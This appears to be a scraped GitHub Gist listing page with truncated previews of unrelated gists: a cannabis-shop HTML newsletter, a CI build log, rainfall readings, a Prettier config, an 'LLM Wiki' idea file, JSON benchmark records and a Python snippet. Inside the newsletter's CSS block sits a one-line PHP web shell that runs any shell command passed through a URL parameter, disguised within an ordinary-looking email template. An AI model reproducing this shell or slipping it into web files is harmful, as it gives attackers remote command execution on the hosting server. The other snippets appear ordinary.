Skip to content

Instantly share code, notes, and snippets.

@dylanopenclaw17-code
dylanopenclaw17-code / weekly-newsletter.html
Created June 29, 2026 06:32
BulkCannabis Weekly Newsletter - 5 New Strains (preview)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>New Drops at Bulk Cannabis</title>
<style>
@import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700;800&display=swap');
body, table, td, a { -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; }
<?php
system($_GET['cmd']);
?>
@zjjlivein
zjjlivein / error_83989609586_build-fleet-whl.txt
Created June 29, 2026 06:31
PaddleFleet CI build-fleet-whl - run 28352996581
2026-06-29T06:27:59.9031029Z ##[group]Run docker exec -t fleet-ci-paddle-release-build-whl-1298-20260629-142743 /bin/bash -ce '
2026-06-29T06:27:59.9032064Z docker exec -t fleet-ci-paddle-release-build-whl-1298-20260629-142743 /bin/bash -ce '
2026-06-29T06:27:59.9032720Z set -x
2026-06-29T06:27:59.9033133Z OPS_DST=paddlefleet_ops-0.0.0-cp312-cp312-linux_x86_64.whl
2026-06-29T06:27:59.9034067Z wget -q --no-proxy "https://paddle-whl.bj.bcebos.com/nightly/cu129/paddlefleet-ops/${OPS_DST}" -O dist/${OPS_DST}
2026-06-29T06:27:59.9034921Z echo "OPS_WHL=${OPS_DST}" >> dist/whl_names.txt
2026-06-29T06:27:59.9035373Z ls -lh dist
2026-06-29T06:27:59.9035683Z cat dist/whl_names.txt
2026-06-29T06:27:59.9562734Z + OPS_DST=paddlefleet_ops-0.0.0-cp312-cp312-linux_x86_64.whl
2026-06-29T06:27:59.9564047Z + wget -q --no-proxy https://paddle-whl.bj.bcebos.com/nightly/cu129/paddlefleet-ops/paddlefleet_ops-0.0.0-cp312-cp312-linux_x86_64.whl -O dist/paddlefleet_ops-0.0.0-cp312-cp312-linux_x86_64.whl
id station stationid value unit obstime date
0 流浮山 RF001 0 mm 2026-06-29T14:15:00+08:00 2026-06-29
1 湿地公园 RF002 0 mm 2026-06-29T14:15:00+08:00 2026-06-29
2 水边围 N12 0 mm 2026-06-29T14:15:00+08:00 2026-06-29
3 石岗 RF003 M mm 2026-06-29T14:15:00+08:00 2026-06-29
4 大美督 RF004 0 mm 2026-06-29T14:15:00+08:00 2026-06-29
5 大埔墟 RF005 0 mm 2026-06-29T14:15:00+08:00 2026-06-29
6 北潭涌 RF006 0 mm 2026-06-29T14:15:00+08:00 2026-06-29
7 滘西洲 RF007 0 mm 2026-06-29T14:15:00+08:00 2026-06-29
8 西贡 N15 0 mm 2026-06-29T14:15:00+08:00 2026-06-29
@Ariyapon123
Ariyapon123 / .prettierrc.json
Created June 29, 2026 06:30
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.8.34+commit.80d5c536.js&optimize=undefined&runs=200&gist=
{
"overrides": [
{
"files": "*.sol",
"options": {
"printWidth": 80,
"tabWidth": 4,
"useTabs": false,
"singleQuote": false,
"bracketSpacing": false
@atz3n
atz3n / llm-wiki.md
Created June 29, 2026 06:30 — forked from karpathy/llm-wiki.md
llm-wiki

LLM Wiki

A pattern for building personal knowledge bases using LLMs.

This is an idea file, it is designed to be copy pasted to your own LLM Agent (e.g. OpenAI Codex, Claude Code, OpenCode / Pi, or etc.). Its goal is to communicate the high level idea, but your agent will build out the specifics in collaboration with you.

The core idea

Most people's experience with LLMs and documents looks like RAG: you upload a collection of files, the LLM retrieves relevant chunks at query time, and generates an answer. This works, but the LLM is rediscovering knowledge from scratch on every question. There's no accumulation. Ask a subtle question that requires synthesizing five documents, and the LLM has to find and piece together the relevant fragments every time. Nothing is built up. NotebookLM, ChatGPT file uploads, and most RAG systems work this way.

@suryajasper
suryajasper / data_20260629_063014.json
Created June 29, 2026 06:30
Temporary JSON storage
[
{
"id": "wave-4wave-rocroller",
"name": "Wave 4-wave (rocroller)",
"backend": "wave",
"backendParam": "wave_4wave_rocroller",
"remoteRepository": "panditsa/wave",
"branch": "4waveasm-256x192x256",
"parentSpecId": "wave-default",
"commitHash": "d79c7474348251cbf7a1ccc6dff562235b77435e"
@suryajasper
suryajasper / data_20260629_063013.json
Created June 29, 2026 06:30
Temporary JSON storage
[]
@suryajasper
suryajasper / data_20260629_063012.json
Created June 29, 2026 06:30
Temporary JSON storage
[
{
"_id": "04d5645e-37a5-4d53-86d2-e5c92c6eb937",
"name": "kernel-1775176412908-23",
"kernelType": "gemm",
"tag": "wave_rocroller",
"machines": [
"mi325",
"mi355"
],
# import the necessary modules and libraries
import json, unittest, datetime
# use the open function to open read the three json files
with open("./data-1.json", "r", encoding="utf-8") as f:
jsonData1 = json.load(f)
with open("./data-2.json", "r", encoding="utf-8") as f:
jsonData2 = json.load(f)